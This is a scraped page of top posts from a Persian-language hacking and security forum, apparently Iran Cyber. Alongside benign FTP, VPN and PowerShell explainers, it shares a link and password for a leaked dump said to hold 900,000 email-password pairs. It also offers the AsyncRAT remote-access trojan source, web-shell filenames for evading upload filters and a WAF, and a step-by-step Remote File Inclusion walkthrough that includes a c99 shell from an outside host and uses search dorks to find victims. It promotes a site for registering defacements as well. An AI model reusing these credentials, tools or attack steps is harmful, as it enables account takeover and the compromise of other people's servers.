بیرون می آید و تمام .
  21. 3 امتیاز
    با سلام خدمت دوستان عزیز انجمن ایران سایبر پس از 1 ماه غیرفعال بودن مجددا راه اندازی گردید و با توجه به تغییراتی که در مالکیت و انجمن صورت گرفته است لازم است یک سری توضیحات جهت مشخص کردن محور فعالیت انجمن اعلام نمایم. 1- مالکیت و فعالیت دامین و سایت تغییر کرده است و زین پس در حوزه امنیت - آموزش امنیت و شبکه - ارزیابی امنیت فعالیت مینماید. 2- هرگونه نفوذ به وبسایت های داخلی و خارجی خلاف قوانین بوده و در صورت مشاهده کاربر خاطی از سایت اخراج شده و مسئولیت هرگونه تخلف بر عهده شخص میباشد نه وبسایت . 3- هرگونه بی احترامی و توهین چه به اشخاص داخلی و خارجی ممنوع بوده و مسئولیت احتمالی برعهده شخص میباشد. 4- انجام هرگونه فعالیت سیاسی کاملا ممنوع میباشد. *** از این تاریخ ( 06/05/1400 ) ( 2021 - 28july ) به قبل تمامی مسئولیت فعالیت ها چه داخل سایت و انجمن و چه خارج از سایت و مسائل مربوط به آن مربوط به مدیریت و مالکیت قبل سایت بوده و مدیریت جدید و مالک جدید سایت عهده دار مسائل حقوقی و ... نمیباشد. با تشکر .
  22. 3 امتیاز
    درود این فایل حاوی 900 هزار ایمیل پسورد می باشد Pass: iran-cyber.net https://anonfile.com/lbU69bp7of/Canva.com_iran-cyber_zip
  23. 3 امتیاز
    learing Video And TOOLS CVE-2019-16759-master.zip
  24. 3 امتیاز
    BTC Wallet Private Keys Checker.zip
  25. 3 امتیاز
    به نام خدای بزرگ با سلام این کتاب رو چند وقت پیش خریداری کردم. حالا با شما دوستان اون رو به اشتراک میزارم. Metasploit-Advanced.rar
  26. 3 امتیاز
    سلام خداقوت دوستان من به شدت به هک و نفوذ علاقه دارم البته نه عنوان خرابکار فقط کنجکاوم که راهاشو بلد باشم و ازشون جلوگیری کنم یه چیزایی رو هم دست و پا شکسته بلدم (دوره CEH رو هم دیدم) میخوام کمکم کنید که چطوری میشه حرفه ای بشم؟ آیا ویدیویی یا دوره ای هست که ببینم؟ تورو خدا کمک کنید به علاقم برسم. متشکرم
  27. 3 امتیاز
    به نام خدای بزرگ با سلام این ابزار برای بروت فورس اتوماتیک دایرکتوری ها در وب کاربرد داره. Goodi.rar
  28. 3 امتیاز
    FTP چیست؟ FTP (File Transfer Protocol) یک سرویس اینترنتی است که برای برقراری ارتباط با یک سرور خاص اینترنت یا رایانه طراحی شده است ، بنابراین کاربران می توانند پرونده ها را به کامپیوتر بفرستند (بارگیری) یا پرونده ها را به سرور بفرستند (بارگذاری). FTP در حال حاضر به طور گسترده ای برای تبادل داده ها مورد استفاده قرار می گیرد ، زیرا این کار ساده تر از استفاده از یک دستگاه سیمی یا فیزیکی است. امید است که با استفاده از این مقاله ، خوانندگان بتوانند درک کنند FTP چیست و چگونه از FTP برای انجام یک سرور از راه دور استفاده کنید. سرورهای از راه دور بدون نیاز به ورود به یک حساب میزبانی یا سرور خصوصی مجازی (VPS) برای مدیریت وب سایت ها بسیار مفید هستند. تاریخچه FTP قبل از بحث در مورد تاریخچه FTP ، من کمی در مورد رابطه Telnet با FTP توضیح خواهم داد. Telnet برای اتصال مستقیم (شبکه غیر مستقیم) استفاده می شود ، در حالی که FTP از اتصال غیرمستقیم استفاده می کند. این دو نوع اتصال TCP / IP دو مدل اصلی معرفی شده هستند. اتصال غیر مستقیم به معنای گرفتن منابع از میزبان از راه دور و استفاده از آنها در سیستم محلی است. سپس آنها را دوباره به میزبان از راه دور منتقل کنید. اولین استاندارد FTP RFC 114 بود که در سال 1971 ، حتی قبل از وجود TCP و IP صادر شد. این استاندارد برای تعریف دستورات اساسی مورد استفاده برای برنامه ریزی یک سیستم ارتباطی که می خواهد از آن استفاده کند ، استفاده می شود. پروتکل FTP مورد استفاده برای استانداردهای اینترنت توسط کمیته ویژه مهندسی اینترنت به عنوان مجموعه ای از اسناد رسمی RFC (درخواست نظر) تهیه شده است. FTP با این هدف ایجاد شده است که کاربران می توانند پرونده ها را از یک مکان به مکان دیگر منتقل کنند. مانند اکثر پروتکل های TCP / IP ، این مدل بر اساس مدل سرویس گیرنده / سرور است. توابع سرور FTP و موارد استفاده FTP چندین توابع FTP وجود دارد که در حال حاضر به طور گسترده مورد استفاده قرار می گیرند ، مانند آپلود صفحات وب به اینترنت از طریق میزبانی وب. توابع دیگر مانند به روزرسانی نسخه های برنامه توسط توسعه دهنده برنامه FTP انجام می شود. به طور کامل ، در اینجا توابع FTP موجود است. بارگذاری صفحات وب سایت در یک سرور وب / میزبانی وب در اینترنت مرور و بارگیری پرونده ها از سایت های نرم افزار عمومی یک پرونده بزرگ را به دو قسمت تقسیم می کند که ممکن است برای پیوست در ایمیل بیش از حد بزرگ باشد بارگیری و بارگذاری محتوا ، مانند دوره های آموزشی در سرور FTP آخرین ویرایش برنامه را همانطور که توسط توسعه دهنده نرم افزار ساخته شده توزیع می کند البته نه تنها این ، توابع FTP بسیاری دیگری نیز وجود دارد که می تواند در انجام کارهای روزمره مورد استفاده قرار گیرد. می توانید خودتان آن را توسعه داده و متناسب با نیازهای مورد نیاز خود تنظیم کنید. با این حال ، اساساً عملکرد ساده FTP این است که کاربران می توانند پرونده ها را از یک مکان به مکان دیگر منتقل کنن همچنین بخوانید: آپلود فایل در هاست و دانلود فایل از هاست با پروتکل ftp و نرم افزار FileZilla
  29. 3 امتیاز
    گسترش اینترنت در دنیای امروز سبب به وجود آمدن شبکه های اینترنتی متفاوتی از جمله شبکه وایرلس شده است. شبکه های وایرلس بر خلاف شبکه های پیشین برای برقراری ارتباط با کامپیوترها و موبایل ها نیازمند کابل نمی باشند و جهت دریافت و ارسال دیتا از امواج رادیویی استفاده می کنند بنابراین برای کاربرانی که نیازمند استفاده از اینترنت قابل حمل هستند، بسیار کاربرد دارد. شبکه های وایرلس امکان استفاده از اینترنت را در همه جا ایجاد کرده است و تعداد وسیعی از افراد می توانند به راحتی در فضاهای کتابخانه، دانشگاه و … به اینترنت دسترسی داشته باشند. این عمومیت در دسترس پذیری اینترنت در شبکه های وایرلس سبب شده است بسیاری از افراد برای ایجاد فضایی امن، از شبکه مجازی اختصاصی یا به اختصار vpn ها استفاده کنند. با خرید vpn یا خرید فیلتر شکن ها می توان علاوه بر برقراری ارتباطی راحت در شبکه ها، از شبکه ای ایمن و سریع بهرمند شد. پس با خرید vpn می توان در شبکه گسترده وایرلس یک شبکه خصوصی برای چند کاربر به خصوص ایجاد کرد. آشنایی با vpn Vpn در واقع مسدود سازی ارتباطات بدون مجوز است همان طور که ویندوز ها نیازمند یک سری مسدودسازی ها هستند شبکه اینترنت هم به این قبیل محدودیت ها نیاز دارد. امروزه بسیار متداول است که فیلتر شکن یا vpn را یک عامل محدود کننده برای استفاده از فضای گسترده اینترنتی می دانند اما اینگونه نیست. درست است که برای عبور از فیلترینگ بسیاری از سایت ها به خرید vpn اقدام می کنیم اما بیشترین کاربرد آنها جهت ایجاد امنیت و خصوصی سازی در شبکه های گسترده ای همچون وایرلس است. باید دانست در هنگام استفاده از فیلتر شکن ها اطلاعات جستجوهای صورت گرفته به جای قرارگیری در ISP های شخصی در اختیار سازندگان vpn قرار می گیرد بنابراین نکته ای که بسیار حائز اهمیت است وجود امنیت در ساز و کارهای سازندگان vpn ها است. بنابراین می توان پیدا کردن یک vpn ایمن را کار مشکلی دانست زیرا به بخش اعظمی از اطلاعات شخصی می تواند دسترسی پیدا کند. گاها با هزینه کردن می توان با یک خرید فیلتر شکن کارآمد و ایمن علاوه بر حفظ حریم شخصی، امنیت فعالیت های فضای مجازی را نیز تضمین کرد. جهت ایجاد امنیت برای استفاده از فیلتر شکن ها بهتر است هنگام استفاده از آنها وارد پروتکل های HTTPS شد تا اطلاعات خصوصی در اختیار هکرها قرار نگیرد. در نهایت می توان گفت با خرید vpn علاوه بر بی معنا کردن مسافت ها در شبکه های وایرلس، می توان فارغ از دردسرهای پروتکل ها از امنیت بالا بهره برد. منبع مقاله: https://bit.ly/2MBDFep
  30. 3 امتیاز
    به نام خدای بزرگ با سلام یک ویدیو درباره ی این موضوع تهیه کردم. فکر نمی کنم که در داخل شبیه به این ویدیو موجود باشه. که شامل مراحل: فازینگ رونویسی eip مکان یابی آفست مربوطه چک کردن وضعیت پشته و آدرس برگشت ایجاد و هدایت شلکد در نهایت هم ایجاد اتصال برگشتی. من از پایتون برای این کار استفاده کردم به خاطر این که عمومی تره در داخل. ولی بهتر هست که از زبان روبی استفاده بشه و اکسپلویت هامون رو شبیه به یکسری ماژول های مستقل به متا اضافه کنیم. چون که متا دارای یکسری پیلود و انکودر خیلی خوب هست و با استفاده از اون ها می تونیم از مکانیزم های امنیتی به راحتی عبور کنیم. این هم اضافه کنم که آسیب پذیری های سری بافر اورفلو فقط بخشی از این مباحث هستش. این موضوعات خیلی گسترده تر از این حرف ها هستش. https://www.aparat.com/v/j0lxo
  31. 3 امتیاز
    با سلام. یک برنامه هستش به نام Perfect Keylogger. https://www.blazingtools.com/bpk.html تو این فیلمی که ضمیمه کردم بدون اینکه نرم افزار رو کرک کنیم سریال برنامه رو بدست میاریم و اونو رجیستر می کنیم☺️ موفق باشید Perfect_keylogger_serial.rar
  32. 3 امتیاز
    خب دایرکتوری عوض میشه خیلی عالیه یک دایرکتوری بالاتر فقط مثالی بود که من گفتم؛ فایلتون رو بیارین روی آدرس root وبسایت. احتمالا مشکلتون حل میشه باز هم اگر نشد بگین من خودم یکم روش کار کنم moodle رو کار نکردم تا حالا
  33. 3 امتیاز
    من این مدل پکرها رو کارنکردم و از مدلش سر در نمیارم. بزارید از بعضی از دوستانم سوال می پرسم و نتیجه رو بهتون اطلاع میدم
  34. 3 امتیاز
    نمیدونم چجوری دارید فایل اپلود میکنید طبق این فیلم جلو برید اپلود شل در whmcs اگر به نتیجه ای نرسیدید اعلام کنید
  35. 3 امتیاز
    سلام بله قبلا همچین مواردی برخورد کرده بودم قابل بایپس هستند باید نکات امنیتی رعایت کنید دلخوش به فایروال ها و .. و پلاگین های امنیتی نباشید تغییرات امنیتی بصورت دستی اعمال کنید
  36. 3 امتیاز
    درود این شل ساده برای بایپس انتی شلر هست waf سروری شل خودتون بارگزاری کردید انتی شلر پاک کرده میتونید از این وب شلر استفاده کنید شل اسکریپت برای پسوند اینارو تست کنید shell.Php5 shell;.jpg.php4 بهتره از ابزار برپ سویت از تب repeater استفاده کنید برای بایپس این چنین موارد درضمن برای بایپس Imunify360 waf می توانید از این اسکریپت بهره برداری کنید اگر سوالی بود در خدمتم اسکریت بایپس waf اینجا کلیک کنید
  37. 3 امتیاز
    سلام براي سيشن ثابت بايد IP static داشته باشيد، و در مودم خود ip forwarding فعال كنيد ngrok همان كار را ميكند ولي خاموش روشن بشه ip و port عوض ميشن
  38. 3 امتیاز
    با سلام. فیلمی که براتون ضمیمه کردن نحوه آنپک کردن دستی برنامه هایی رو نشون میده ک هبا aspack 2 پک شدند...! فیلم واضح و گویا هست موفق باشید./54.gif
  39. 3 امتیاز
    https://throwbin.io/gpjKZRy همه زمان دار
  40. 3 امتیاز
    با سلام میتونید از این برنامه استفاده کنید dvd-unlocker.zip
  41. 3 امتیاز
    Client screen viewer & recorder Client Antivirus & Integrity manager Client SFTP access including upload & download Client & Server chat window Client Dynamic DNS & Multi-Server support (Configurable) Client Password Recovery Client JIT compiler Client Keylogger Client Anti Analysis (Configurable) Server Controlled updates Client Antimalware Start-up Server Config Editor Server multiport receiver (Configurable) Server thumbnails Server binary builder (Configurable) Server obfuscator (Configurable) AsyncRAT-C-Sharp-master.zip
  42. 3 امتیاز
    سلام امروز بابخش دوم Website hacking theory در خدمتتونم خب میریم سر بحث اصلی Remote File Inclusion گنجاندن پرونده از راه دور (RFI) هنگامی اتفاق می افتد که یک پرونده راه دور ، معمولاً یک پوسته (یک رابط گرافیکی برای مرور فایلهای از راه دور و اجرای کد شخصی شما روی یک سرور) ، در یک وب سایت گنجانده می شود که به هکر اجازه می دهد دستورات سمت سرور را به عنوان فعلی اجرا کند. روی کاربر وارد شده و به پرونده های روی سرور دسترسی داشته باشید. با استفاده از این قدرت ، هکر می تواند به استفاده از سوء استفاده های محلی ادامه دهد تا امتیازات خود را افزایش داده و کل سیستم را به دست بگیرد. بسیاری از سرورها به دلیل تنظیمات پیش فرض PHP در ثبت_گلوبارها و اجازه فعال شدن اجازه_ورل_فوپن در برابر این نوع حمله آسیب پذیر هستند. اگرچه از PHP 6.0 ، Register_globals حذف شده است ، اما بسیاری از وب سایت ها هنوز به نسخه های قدیمی تر PHP اعتماد می کنند تا وب خود را اجرا کنند. اکنون قدم هایی را که یک هکر برای سوءاستفاده از این نوع آسیب پذیری در یک وب سایت می گذارد ، طی خواهیم کرد. 1. ابتدا هکر وب سایتی را پیدا می کند که صفحات خود را از طریق PHP شامل عملکرد () () () می کند و در برابر RFI آسیب پذیر است. بسیاری از هکرها از دستگیره های گوگل استفاده می کنند تا سرورهای آسیب پذیر RFI را پیدا کنند. Dork Google عملی است که از ابزارهای جستجوی ارائه شده Google برای کمک به نتیجه جستجوی خاص استفاده می کند. 2. وب سایت هایی که شامل صفحات هستند دارای یک سیستم ناوبری شبیه به: http://target-site.com/index.php?page=PageName 3. برای دیدن اینکه آیا یک صفحه آسیب پذیر است ، هکر سعی می کند یک سایت را به جای PageName مانند موارد زیر بگذارد: http://target-site.com/index.php?page=http://google.com 4- اگر صفحه اصلی گوگل در وب سایت نشان داده شود ، هکر می داند وب سایت آسیب پذیر است و همچنان شامل پوسته می شود. 5. از محبوب ترین پوسته ها c99 و r57 هستند (خودم به b374k علاقه دارم ). یک هکر یا آنها را در یک سرور از راه دور بارگذاری می کند یا فقط از یک گوگل استفاده می کند . برای یافتن آنها در حال حاضر( آنلاین ) ، هکر در جستجوی Google می باشد: inurl: c99.txt. با این کار بسیاری از وب سایت ها با پوسته از قبل آماده شده و آماده گنجانده شدن هستند را نشان میدهد . در پایان URL مطمئن شوید که می خواهید یک اضافه کنید؟ به طوری که اگر هر چیزی بعد از c99.txt بیاید ، به پوسته منتقل می شود و مشکلی ایجاد نمی کند. نشانی اینترنتی جدید با پوسته شامل می شود: http://target-site.com/index.php?page=http://site.com/c99.txt? 6. بعضی اوقات اسکریپت PHP در سرور ".php" را به انتهای هر پرونده اضافه می کند. بنابراین اگر پوسته را گنجانده باشید ، در نهایت مانند "c99.txt.php" به نظر می رسد و کار نمی کند. برای بدست آوردن این مسئله ، یک بایت تهی (00٪) به انتهای c99.txt اضافه می کنید. این به سرور می گوید که همه چیز را پس از c99.txt نادیده بگیرد. 7. در مرحله اول ، به شما گفتم كه هكرها از دستكارهای Google استفاده می كنند تا به دنبال سایتهایی باشند كه احتمالاً در معرض RFI آسیب پذیر باشند. نمونه ای از Google Dork خواهد بود . allinurl:.php?page=. این به دنبال آدرس URL با .php?page= در آنها است. این فقط یک نمونه است و شما به احتمال زیاد هیچ سایت آسیب پذیر با آن جستجو پیدا نمی کنید. می توانید کلمه "صفحه" را با حروف دیگر و کلمات مشابه تغییر دهید. هکرها معمولاً برای یافتن آسیب پذیری های RFI در سیستم های مدیریت محتوای سایت ، از Google dork استفاده میکنند. 8. اگر هکر موفق شد سرور را برای تجزیه پوسته بدست آورد ، به وی صفحه ای شبیه به شکل زیر ارائه می شود: از اینجا هکر دایرکتوری پیدا می کند که امتیازات خواندن و نوشتن را دارد و پوسته را بارگذاری می کند اما این بار به عنوان یک پرونده .php به طوری که آسیب پذیری برطرف شود ، وی بعداً می تواند به آن دسترسی پیدا کند. 9- هکر بعداً راهی برای به دست آوردن امتیازات اصلی در سیستم پیدا می کند. او می تواند این کار را با بارگیری و اجرای بهره برداری های محلی در برابر سرور انجام دهد. او همچنین می تواند سرور قربانی را برای پرونده های پیکربندی جستجو کند. این پرونده ها ممکن است حاوی نام کاربری و کلمه عبور برای پایگاه داده های MYSQL و مواردی از این دست باشد. برای محافظت از خود در برابر حملات RFI ، کافیست از اسکریپت های به روز استفاده کنید و مطمئن شوید که فایل php.ini سرور دارای Register_globals و lejed_url_fopen غیرفعال است. ادامه دارد .....
  43. 3 امتیاز
    سلام , اگر سامسونگ اکانت ساخته باشی و به نت وصل باشه خیلی راحت میتونی برداری پترن رو علاوه بر Pattren , پسورد هم یادتون رفته؟!
  44. 2 امتیاز
    به نام خدای بزرگ با سلام خدمت اساتید کامندلت ها دارای ساختار فعل و اسم در ارتباط با یکدیگر هستند. یعنی کاری که ما می خواهیم انجام بدیم که میشه verb و اینکه کار رو برای چه کسی انجام بدیم که میشه noun مثل کامندلت Get-ChildItem که ساختار دستوری فعل و اسم به سیستم میگه آیتم های فرزند رو بگیر و نشون بده. اگه دستوری مثل ls یا dir رو در پاورشل وارد کنیم هم همین کار رو برای ما انجام میده. حالا دلیلش چیه؟ چون که این ها اسامی مستعار هستن و در واقع میانبرهایی برای اشاره به کامندلت های واقعی هستن. کامندلتی وجود داره که نام های الیاس ها یا همون اسامی مستعار رو برای من لیست می کنه. Get-Alias دونستن این کامندلت بسیار مهم هست و کار رو برای ما تا حدود زیادی راحت تر می کنه. و همچنین می تونم کامندلت معادل هر کدوم رو مشاهده کنم که هم dir و هم ls به یک کامندلت اشاره می کنند. یعنی Get-ChildItem احتیاجی به حفظ کامندلت ها نیست همین که با مفهوم کار آشنا بشید کافی هستش. این فقط یه مثال ساده بود ولی در عمل میشه کارهای فوق العاده ای با کامندلت ها انجام داد. موفق باشید.
  45. 2 امتیاز
    با سلام و درود سایت zone-hc.ir با موفقیت راه‌اندازی شد این سایت درجهت رفاه‌حال دیفیسرهای ایرانی و در راستای ثبت لینکهای هک‌شده و رهایی از مشکلات ثبت لینک در سایت‌های خارجی که در این زمینه فعالیت میکنند راه‌اندازی شده، امید است که در بین شما دیفیسرهای عزیز جا باز کنه و مورد قبول و مدرکی معتبر واقع شود نوشته‌شده با ❤️
  46. 2 امتیاز
    با سلام. مجموعه کامل exelab که شامل دسته بندی زیر هستش... نزدیک 45 گیگه... لینک دانلود: Link: https://mega.nz/folder/aho3gS5Y Key: y64Q7HHQjjvAIuFGuzXqow موفق باشید:💓
  47. 2 امتیاز
    درود دوست عزیز توصیحات شما بسیار کلی بوده نیاز به بررسی دارد بهتر لاگ های سرور بررسی و آنالیز کنید دوم سورس سایت را از نظر فنی بررسی کنید مثال : ممکن فرد نفوذگر بخاطر پیکیر بندی نادرست درستی گرفته از سایت وبکدور کاشته و هر دفعه اقدام به تخریب می نماید و کلی سناریو هست بهترین راه انالیر و تحلیل لاگ های سرور و تست امنیت سورس و پرمیشن بندی فایل اقدام نمایید باتشکر
  48. 2 امتیاز
    دوست عزیز فکر کنم مسکل از همون php که براتون نصب کردنه ، به صورت لوکل هر وقت نیاز باشه دیفیس میکنن ، بهش میگن لوکال روت فکر کنم ، cms, رو عوض کنید
  49. 2 امتیاز
    با سلام. ورژن جدبد برنامه Detect It Easy 3.0 با امکانات جدید. این برنمه از نوع Packer Scanners های خیلی خوب و کاربر پسند هستش. لینک دانلود: https://workupload.com/file/gcjfzPZttjC موفق باشید die_win32_portable_3.00.zip
  50. 2 امتیاز
    John the Ripper ساده کردن رمز عبور با کمک نرم افزار John Ripper همچنین اضافه کردن قابلیت های اضافی مانند بهبود هش و گردش کار رمز عبور ، حملات و مدیریت جلسات ، بازخورد بصری و آمار johnny_2.2_win.zip

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...